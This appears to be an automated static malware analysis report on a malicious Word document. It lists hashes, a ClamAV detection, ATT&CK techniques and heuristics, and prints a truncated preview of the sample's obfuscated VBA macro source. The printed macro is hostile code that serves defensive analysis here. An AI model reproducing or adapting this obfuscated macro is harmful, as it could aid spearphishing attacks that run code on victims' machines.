Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 161ba501b4ea6f7c…

MALICIOUS

Office (OLE)

Size: 118.5 KB
Created: 2018-10-17 01:44:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 63ada2e84d1426c582fc48a7006b4202
SHA-1: 5640784d291346e7d08bfecc71c3aa60e13c263d
SHA-256: 161ba501b4ea6f7c2c8d224e55e566fef95064e1ed059d8287bc07e790f740e8
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristics and the ClamAV detection name 'Doc.Malware.Valyria-9761059-0'. The VBA code, though obfuscated, utilizes functions like GetObject and CallByName, suggesting an attempt to execute arbitrary code. The presence of the 'macros.bas' artifact and the detection name strongly imply that the primary function of this document is to act as a malicious attachment, likely for delivering a second-stage payload via its macros.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 41106 bytes
SHA-256: 3dc89ce9e47ac547227e1fe7d588041b07577583676f73a40bf1ffa430ecfd86
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sub1, 0, 0, MSForms, Frame"
Dim let29, let05(2) As Byte, let0(9) As Byte, let59(32) As Byte, let94(19) As Byte, let47(13) As Byte, let9(6) As Byte, let58(55) As Byte, let34(1267) As Byte, let54(5) As Byte, let22(39) As Byte, let73(39) As Byte, let46(1 To 255) As Byte
Private Function let2(let07() As Byte, let76)
Dim let95, let60
On Error GoTo let72
While let95 <= let76
let60 = let07(let95)
If let60 = 0 Then
Exit Function
End If
let2 = let2 & let97(let60)
let60 = 0
let95 = let95 + 1
Wend
let72:
End Function
Private Function let61()
Dim let06, let39, let70, let17() As Byte, let10, let74
let74 = 1
While let74 <= (187170 / 734)
let46(let74) = let74
let74 = let74 + 1
Wend
let96
let27
let10 = (6626 - 6370)
let49
While let39 = 0
let17 = CStr(let06)
let70 = let66(let17())
If let70 >= 1 Then
let9(2) = let17(0) + (let17(1) * let10)
If let70 >= 3 Then
let9(3) = let17(2) + (let17(3) * let10)
If let70 >= 5 Then
let9(4) = let17(4) + (let17(5) * let10)
If let70 >= 7 Then
let9(5) = let17(6) + (let17(7) * let10)
If let70 >= 9 Then
let9(6) = let17(8) + (let17(9) * let10)
End If
End If
End If
End If
End If
If let23(let35(let22(), let78(let9()), 39), let73, 39) = 1 Then
let39 = 127
End If
let06 = let06 + 1
Wend
If let39 = 127 Then
let93
Else
MsgBox let39
End If
End Function
Private Sub let64()
let05(2) = let46(11)
let05(0) = let46(47)
let05(1) = let46(126)
End Sub
Private Sub let56()
let59(4) = let46(84)
let59(15) = let46(216)
let59(0) = let46(31)
let59(6) = let46(190)
let59(22) = let46(236)
let59(10) = let46(121)
let59(28) = let46(113)
let59(23) = let46(78)
let59(16) = let46(17)
let59(18) = let46(18)
let59(19) = let46(64)
let59(20) = let46(131)
let59(31) = let46(141)
let59(21) = let46(60)
let59(29) = let46(200)
let59(12) = let46(87)
let59(5) = let46(96)
let59(2) = let46(17)
let59(7) = let46(42)
let59(27) = let46(252)
let59(8) = let46(208)
let59(32) = let46(23)
let59(25) = let46(178)
let59(17) = let46(50)
let59(14) = let46(62)
let59(1) = let46(114)
let59(11) = let46(224)
let59(13) = let46(108)
let59(9) = let46(189)
let59(26) = let46(90)
let59(3) = let46(238)
let59(24) = let46(94)
let59(30) = let46(83)
End Sub
Private Sub let99()
let47(11) = let46(236)
let47(2) = let46(30)
let47(5) = let46(68)
let47(0) = let46(59)
let47(7) = let46(42)
let47(4) = let46(93)
let47(13) = let46(111)
let47(10) = let46(120)
let47(9) = let46(174)
let47(1) = let46(107)
let47(3) = let46(244)
let47(6) = let46(164)
let47(12) = let46(70)
let47(8) = let46(158)
End Sub
Private Sub let96()
let73(10) = let46(51)
let73(17) = let46(48)
let73(28) = let46(57)
let73(29) = let46(69)
let73(31) = let46(67)
let73(18) = let46(57)
let73(34) = let46(65)
let73(32) = let46(48)
let73(15) = let46(70)
let73(16) = let46(67)
let73(11) = let46(55)
let73(35) = let46(55)
let73(19) = let46(53)
let73(30) = let46(66)
let73(4) = let46(66)
let73(22) = let46(54)
let73(23) = let46(57)
let73(20) = let46(52)
let73(21) = let46(57)
let73(5) = let46(55)
let73(27) = let46(50)
let73(36) = let46(48)
let73(9) = let46(68)
let73(13) = let46(56)
let73(38) = let46(54)
let73(26) = let46(55)
let73(2) = let46(67)
let73(3) = let46(56)
let73(8) = let46(65)
let73(24) = let46(49)
let73(1) = let46(51)
let73(0) = let46(69)
let73(12) = let46(49)
let73(14) = let46(53)
let73(33) = let46(50)
let73(7) = let46(52)
let73(37) = let46(48)
let73(6) = let46(66)
let73(25) = let46(55)
let73(39) = let46(51)
End Sub
Private Sub let21()
let58(17) = let46(42)
let58(27) = let46(226)
let58(31) = let46(142)
let58(33) = let46(168)
let58(32) = let46(1)
let58(10) = let46(127)
let58(36) = let46(166)
let58(45) = let46(24)
let58(39) = let46(163)
let58(55) = let46(64)
let58(47) = let46(
... (truncated)